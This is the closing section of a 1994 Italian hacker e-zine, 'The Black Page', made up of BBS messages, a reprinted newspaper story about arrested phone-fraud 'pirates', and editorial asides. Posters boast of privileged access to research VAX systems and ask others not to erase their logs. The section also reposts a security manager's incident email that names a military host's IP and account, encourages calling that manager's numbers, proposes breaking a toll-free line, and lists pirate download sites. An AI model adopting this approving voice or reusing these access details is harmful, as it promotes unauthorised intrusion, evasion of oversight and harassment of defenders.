decnet globale, non tutto ma molti vax si.
komunkue il cern e' linkato a tutto, non e' il kaso di usare gli accounst
dei lamers ke giravano sul cern e ke girano da sempre x avere accesso ai
diski del cern stesso.
I links piu grandi kon l'italia, a kaunto ho visto, il cern li ha kon
l'Infn, altri granmdissimi koglioni.
Una kosa: nessuno skannando x.25/inet/decnet ha mai bekkato il vax di
kontrollo del gran sasso? cioe...
di un koso (non rikorod kosa) ke han messo sotto o dentreo il gran sasso,
un vax 4000 mi pare.. xke io ho un account full privs la, ma mi son xso
l'indir decnet e inet, kuello x.25 ce l'ho xo' e in Na al momento.
grazie
Mitt Xxx
Data 23/07/94 14:44:34
Msg_XXXX 1/1 Object: ENEA
li stimo e continuero' a stimarli per quello che fanno, io non sono
maistato buttato fuori da niente se e' per questo ma non e' perche'
glioperatorisono coglioni, semplicemente minascondo bene..
infn confermo, addirittura su un sunos mi sono cuccato il filesistem
montato in remoto diun server del cern, robetta da iente comunque..
il net del gran sasso e' infn, ti ricordi il nome del vax? ildomain
e' gs.infn.it a memoria, ci sono entrato ultimamente X il cisco,
sofndabile ma niente x.25. se entri non cancellarmi i log
---------------------------------------
Corriere della Sera 03 Agosto 1994
---------------------------------------------------------------------------
Denunciati 5 giovani: Hanno fatto pagare salate bollette Sip a una societa'
di comunicazioni
I PIRATI TRADITI DA SAMANTHA
Il collegamento con la linea erotica smaschera i truffatori col computer
--------------------------------------------------------------------------
A cura di Ice MC
Da quasi un anno la bolletta Sip per i collegamenti via computer sembrava
impazzita. c'erano delle spese per i servizi erotici di Samantha, una di
quelle messagerie su cui gli appassionati si scatenano con le fantasie piu'
turpi. Poi sono arrivati i costi per la consultazione delle banche dati di
anziende aerospaziali e uffici federali americani. Dalla corte di cassazione
di roma, e le cifre astronomiche per i collegamenti con la rete telefonica
cinese.
Tutto questo era a capo di una societa' specializzata in telecomnucazioni.
Per un po' la ditta ha pagato: fino a 150 milioni a bimestre. Ma tre mesi
fa i manager si sono decisi a presentare una denuncia alla Digos ed e'
comincita la prima indagine computerizzata mai messa a segno a Milano.
Gli investigatori non hanno fatto pedinamenti, ma hanno trascorso intere
settimane al loro computer per intercettare le connessioni illegali. Alla
fine cinque giovani pirati informatici sono stati denunciati per frode
informatica: due reati entrati a far parte del codice penale soltanto
l'anno scorso.
Dei cinque, tre sono di Milano: Fabio P., 25 anni, autista di camion con
la grande passione per i computer, Maurizio O., 21, studente di Scienze
politiche, Luca R., 22, anche lui studente universitario. Gli altri due
invece sono Massimiliano L., 25 anni, tecnico in un'azienda a Roma dove
abita, e Andrea S., 17 anni, studente, di Siracusa.
I cinque non si conoscevano. Da una banca dati pirata avevano saputo il
codcie segreto della societa' di telecommunicazioni milanese che, per le
sue necessita' di lavoro, era collegata al servizio Itapac, la rete
informatica della Sip. Il codice segreto e' il numero di identificazione
con cui la Sip riconosce l'abbonato e gli addebita gli scatti. E proprio
avendo quel numero, con le loro tastiere, i cinque pirati si sono inseriti
nella rete Itapac. Per due mesi gli agenti, diretti dal vicequestore Dino
Finolli, hanno seguito sui loo video le loro scorribande informatiche:
un lavoro simile alle intercettazioni telefoniche. I tre ragazzi di Milano
e il collega di Siracusa sono stati subito irintracciati, perche'
utilizzavano la linea telefonica di casa. Piu' difficile invece risalire
al tecnico di Roma, che si serviva del computer dell'azienda dove lavora.
I poliziotti dovevano identificarlo tra decine di dipendenti. Ma non hanno
fatto fatica: Massimiliano L. si collegava quasi sempre alla messageria
erotica di Samantha. Una ragazza della Digos lo ha convinto, via computer,
a rivelare il numero di telefono promettendogli qualcosa di vermente sexi.
Gli investigatori hanno cosi' rintracciato l'azienda. E verso le 11
dell'altra mattina una squadra, inviata a Roma, lo ha sorpreso con il
computer ancora acceso.
Fabrizio Gatti
[N.d.R.: Allora.. come al solito la Digos fa' cilecca.. o per lo meno..
becca solo i + Lame..hehe ...
In sostanza.. volete fare sesso al vdt?.. beh..fatevi dare il suo
di numero.. =:-P Ice MC ]
[N.d.R.: Voci di corridoio parlano di altri 20 fermi nella zona di Milano
ma prendetela colle pinze, potrebbero essere solo stronzate. Del
resto l'avete letto alcune "stronzate" piu' sopra :)
Sul prossimo numero di TBP intervisteremo, se ci riuscira' di
contattarli, i diretti interessati :O ]
---------------------------------------
SOMETHING FROM SECTEC BBS
-------------------------
Msg #1018 Wednesday, June 22, 1994 03:15 CET
From: Nexus.6%bbs@sectec.greenie.muc.de (Nexus 6)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: lamers!
I left mesages on this bbs about a system, a military systen and here
it is from cert ... so there is someone here that is really a lamer
and he works for CERT so keep your eyes reallo open! here you are the
txt
From bin Mon Jun 13 01:38 EDT 1994Received: from tymix.tymnet.com by
hp.hq.dla.mil (16.6/1.34) id AA02086; Mon, 13 Jun 94 01:38:50
-0400Received: by tymix.Tymnet.COM (4.1/SMI-4.1) id AA25206;
Sun, 12 Jun 94 22:40:48 PDTReceived: from druid by
tymix.Tymnet.COM (in.smtpd); 12 Jun 94 22:40:48 PDTReceived: by
druid.Tymnet.COM (4.1/SMI-4.1) id AA25144; Sun, 12 Jun 94
22:39:32 PDTDate: Sun, 12 Jun 94 22:39:32 PDTFrom: ddrew@Tymnet.COM
(Dale Drew)Message-Id: <9406130539.AA25144@druid.Tymnet.COM>To:
cert@cert.org, ddrew@Tymnet.COM, nsd@druid.Tymnet.COM,
postmaster@hp.hq.dla.mil, root@hp.hq.dla.milSubject: Possible
IncidentTo whom it may concern:My name is Dale Drew, and I am the
manager of the Data Systems Security Department here at MCI.During a
recent data investigation, our department identified a computermessage
left on a Bulletin Board System, left by a computer "hacker".The
computer hacker left a message to all members of the BBS that
includedan account name and password that could apparently be used to
access your computer system. The hacker also indicates that he has
access to other accounts to other systems at your site, but did not
provide additionaldetails to the extent of that apparent access.The
system IP number is: 131.62.0.2, and the account name is "fho0337".
Apassword was left as well, but I will not transmitt it over e-mail,
nor theactual BBS message itself, unless otherwise permitted by your
site to do so.We do not know the validity of the BBS message, I am
merely passing it alongas an FYI. Additional information about this
incident can be obtained bycontacting me directly. Information about
the poster of the message is alsoavailable.Best regards,
"SUCCESS THROUGH TEAMWORK"
=========================================================================
Dale Drew MCI
Telecommunications Manager
Data Systems Integrity Voice: (408) 922-6526
Internet: ddrew@Tymnet.COM Fax : (408) 922-8870
MCIMAIL: Dale_Drew/644-3335 #
Msg #1025 Friday, June 24, 1994 11:46 CET
From: The.Aky%bbs@sectec.greenie.muc.de (The Aky)
Subject: Re: lamers!
>so should we keep our H/P-info by ourselves? If some asshole is really
doing
>that shit above, he could get our ass' burned....
hmmm.. or he could get HIS ass burned.. hmm look this
>> Data Systems Integrity Voice: (408) 922-6526
>> Internet: ddrew@Tymnet.COM Fax : (408) 922-8870
>> MCIMAIL: Dale_Drew/644-3335 #
call these numbers :P
Msg #1035 Monday, July 4, 1994 01:28 CET
From: Ceasar.Thecat%bbs@sectec.greenie.muc.de (Ceasar Thecat)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: WHY PAY FULL PRICE FOR A LONG DISTANCE CALL FROM EUROPE ?
If you have to call home or business in US, Canada or any other country
(outside EC) stop paying the full price. From now on you can benefit of
the US cheap prices with the Call-back service. You just have to call
their computer in Houston (this is free), it calls you back and gives
you a dial tone. This works for voice as well as for faxes and modem
communications. NO MINIMUM, you pay for what you really use NO ENTRY
FEES, they set the service frely for you.
MONTHLY DETAILED BILL in US dollars, pay with your credit card
possible destinations list and detailed prices available on request
contact Nicolas Laurance (33-1) 40.61.03.51
---
Hey do you smell what I am smelling? he.. Equip yourself with an
Omega.exe
and go and break that shit. It is tool-free from Europe . America
online universal tool free number, should be breakable. Call the guy
and find the number.
Ceasar
Msg #201 Saturday, June 25, 1994 09:19 CET
From: Dark.Side%bbs@sectec.greenie.muc.de (Dark Side)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: inet sites
hello...
dunno if it was asked, but here are some interesting sites... (ftp)
uranus.ifi.unit.no/pub/Version_1.6_prerel_1/Demo_filer/
192.31.181.1
128.184.1.1 /UniOn-students/incoming/" "
most are pc/amiga/mac/etc...
check me if you need more...
post others if you got them!
Australia
~~~~~~~~~
GSM went live in Australia on May 20th after two months of trials.
The Optus GSM network, which will be available in all Australian capitals by
Christmas, uses infrastructure by Nortel Matra Cellular.
****************************
FidoNet boards are legal as well and have been busted anyway - in Italy,
logic doesn't count!
[N.d.R. AAAAHAHAHAHAHAHAHHHAHAHAHHAHAHAHAH SCSI ha sempre ragione :) ]
Msg #233 Sunday, August 28, 1994 18:51 CET
From: The.Aky%bbs@sectec.greenie.muc.de (The Aky)
Subject: Re: IRC
>I need a workin dialin with an IRC-account ...! Yes , only for IRC..
iftp irc client from cs.bu.edu and there you go...
s
Msg #234 Monday, August 29, 1994 08:48 CET
From: Massimo.Baga%bbs@sectec.greenie.muc.de (Massimo Baga)
Subject: Re: IRC
Ganja.Man%bbs@sectec.greenie.muc.de (Ganja Man) writes:
u should check for +1 515 945 7000.
it provides u free telnet access and IRC .
Cheers,
Massimo
Msg #29 Monday, August 8, 1994 21:18 CET
From: Speed.Demon%bbs@sectec.greenie.muc.de (Speed Demon)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: fsp site
Decent FSP site.
Physical Plant #5 128.206.29.11 12321
Pc and Mac wares
============================================================================
Beh, fine delle stronzate. Speriamo che vi siano piaciute !!!
+++ATH
j)(/ kjk=#
OK
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - THE END
COMMIATO
========
Bene, questa e' proprio la fine. Speriamo che questa strana rivista vi
sia piaciuta. E' solo un tentativo di tirare fuori qualcosa di buono, dal no-
stro paese, che finora sembra solo popolato da stronzi :) vabbe' va, in ogni
caso prendetela per com'e', e NON ROMPETECI I COGLIONI dicendo cazzate, che e'
lamer, che fa schifo, perche' a noi cosi' va bene.
E POI, CAZZO !!! Ho cercato per MESI dei collaboratori, e voi, SI, VOI,
STRONZACCI, mi avete detto "ma se scrivo solo io allora non se ne fa niente"
oppure "ma io non voglio sputtanare quello che so" e cazzate del genere. SI,
CAZZATE, perche' basta un po' di fantasia per tirare fuori cose interessanti.
Questo numero, almeno credo, non ha niente di illecito al suo interno. Contie-
ne dati prelevati da BBS e CHAT di vario tipo, chiunque puo' andare li' e
prenderseli. Ma rappresenta piu' che altro un nostro ESPERIMENTO, per vedere
se dopo aver letto ste cazzate qualcuno si decidera' ad aiutarci.
Molti avrebbero prima di tutto voluto vedere di che si trattava per poi
decidere se collaborare o no. Bene, adesso l'avete visto. Questa magazine e'
aperta a ogni tipo di cosa che riguardi il ns mondo telematico. Quindi, fatevi
sotto !!! Se avete intenzione di collaborare, di mandarci dei vs articoli, di
farci delle domande, di esprimere le vs opinioni sulla rivista, o per darci
dei suggerimenti, o anche semplicemente per INSULTARCI, beh, scrivete agli in-
dirizzi EMAIL sotto-riportati. FATELO !!! E SUBITO !!! :)
============================================================================
H THE BLACK PAGE - Numero 0 - Settembre 1994 - INDIRIZZI EMAIL VALIDI : H
============================================================================
H H \ / T H
H Internet : ay146@freenet.hsc.colorado.edu H ___\__/\---/--- F E H
H H _____\/\-/----- I L H
H Cybernet : 65:1200/1 DECODER BBS H ______//------- G E H
H Scrivere a "Dupree's Paradise" H _____//\-\----- H C H
H H / \ T O H
H QSD : Mailbox "DUPREES PARADISE" H / \ M H
H H H
H Videotel : Arkimede *52181# H TELECOM H
H NUA 2551604400 H SE LA CONOSCI H
H Lasciare CPE all'user "DUPREE'S" H LA EVITI H
H H H
============================================================================
THE BLACK PAGE - In questo numero hanno collaborato :
-----------------------------------------------------
Dupree's Paradise - Redattore capo
Ice MC - Redattore quasi capo anche lui :)
Ace - Corrispondente dagli Esteri :)
Hitman Italy - The K00l Unix guy ;)
Si ringrazia tacitamente Sxs per la "Mucca che caga" di IRC
-----------------------------------------------------------
Si ringraziano i seguenti esseri, reali o virtuali :
----------------------------------------------------
Ace
Hitman Italy
I Vax Brothers
Lo staff di Arkimede
SevenUp e tutti quanti su SECTEC BBS
Black Jack
Agora' Telematica
Gomma, Luc Pac e tutto lo staff di Decoder BBS
Lo staff di One Man Crew
Per qualsiasi messaggio utilizzate la seguente chiave PGP 2.3a :
================================================================
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi4ineEAAAEEAKT5tLs4cMmniPjJE1Xv0D0/sbxTKPCY+f60c7px/xXUDObv
47fnFscT7lOZ7TeCJVo8m7qfj6HqiqSLuRMTNeAEcTUvUYoa7I+mNceL3rVgkqid
qf3RP0av7AFCfICSnzzA/KD3M73I0SBeAt3Mple6EeJ0C7sA+o2626Mw2H/BAAUR
tNdEdXByZWUncyBQYXJhZGlzZSA8UVNEIE1ieCA6ICJEVVBSRUVTIFBBUkFESVNF
Ij4gICAgIDxGaWRvbmV0IDI6MzMxLzM2OT4gICAgICAgIDxheTE0NkBGcmVlbmV0
LkhzYy5Db2xvcmFkby5FZHU+ICAgICAgICAgICAgICAgICAgICAgPEN5YmVybmV0
IDY1OjEyMDAvMT4gICAgICAgPER1cHJlZSdzLlBhcmFkaXNlJWJic0BTZWN0ZWMu
R3JlZW5pZS5NdWMuRGU+ICAgICAgICA6KYkAlQIFEC4in4nJtVamMFAlIQEBFu8E
AKLEfKdOjF+rV5gBg1/KFQ//CHsfYS4FNd3qvbRx6PEUIy3NJ4+YSpGAsPgxNyGg
gVv7QEHHeDlRwgrSkVvM2AaIwYWxZqs2/X09Igy2QowpfTduVppN0mzGyb2/ug5k
PyYA/rsriHxmciMjAUjcptv+7WYVx73q7PmbSTUzYjQA
=pvb/
-----END PGP PUBLIC KEY BLOCK-----
@BEGIN FILE_ID.DIZ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ɼ * Dupree's Paradise * & -IceMC- Ȼ
ÇÄÄÄÄÄÄÄÄÄÄpÄrÄeÄsÄeÄnÄtÄsÄÄÄÄÄÄÄÄÄĶ
º The First Italian ------------=== º
º ===----------- Cyberpunk Magazine º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
ÇÄ The Black Page Ķ
º* Issue 00 - September 1994 *º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
º La 1a rivista telematica ITALIANA º
º di CYBERPUNK e CONTROINFORMAZIONE º
º - The Black Page - º
º - Numero 00 -- Settembre 1994 - º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
@END FILE_ID.DIZ
=================================NO CARRIER=================================